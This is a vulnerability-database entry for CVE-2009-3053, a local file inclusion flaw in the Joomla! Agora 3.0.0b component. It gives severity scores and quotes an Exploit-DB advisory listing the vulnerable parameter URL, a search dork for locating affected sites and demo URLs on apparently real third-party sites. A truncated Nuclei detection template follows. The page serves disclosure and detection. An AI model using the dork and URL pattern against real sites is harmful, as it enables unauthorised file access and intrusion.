CVE-2009-3053
Published 2009-09-03
CVE-2009-3053: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files…
Priority P3 · 41 · medium · 6.8 · CVSS 2.0
AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 5.92% (92.3th percentile)
Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jvitals | com_agora | — | — |
No detection rules found.
Exploit-DB
Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
exploitdb·2009-09-01
---
@~~=Author : ByALBAYX
@~~=Website : WWW.C4TEAM.ORG
@~~=A blessed Ramadan to the whole Islamic world.
@~~=======================================~~@
@~~=Script : Joomla Component Com_Agora
@~~=S.Site : http://joomlame.com
@~~=======================================~~@
@~~=Vuln : http://c4team.org/ [Yol] /index.php?option=com_agora&task=profile&page=avatars&action= [-LFI-]
@~~=Dork : Powered by Agora 3.0.0b
@~~=Demo : http://haaseit.com/index.php?option=com_agora&task=profile&page=avatars&action=
         : http://fairweatherforge.com/index.php?option=com_agora&t
Nuclei
Joomla! Agora 3.0.0b - Local File Inclusion
nuclei·CVSS 6.8
Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
Template:
```yaml
id: CVE-2009-3053
info:
  name: Joomla! Agora 3.0.0b - Local File Inclusion
  author: daffainfo
  severity: medium
  description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
  remediation: |
    Apply the latest security patches or upgrad
```
2009-09-03
Published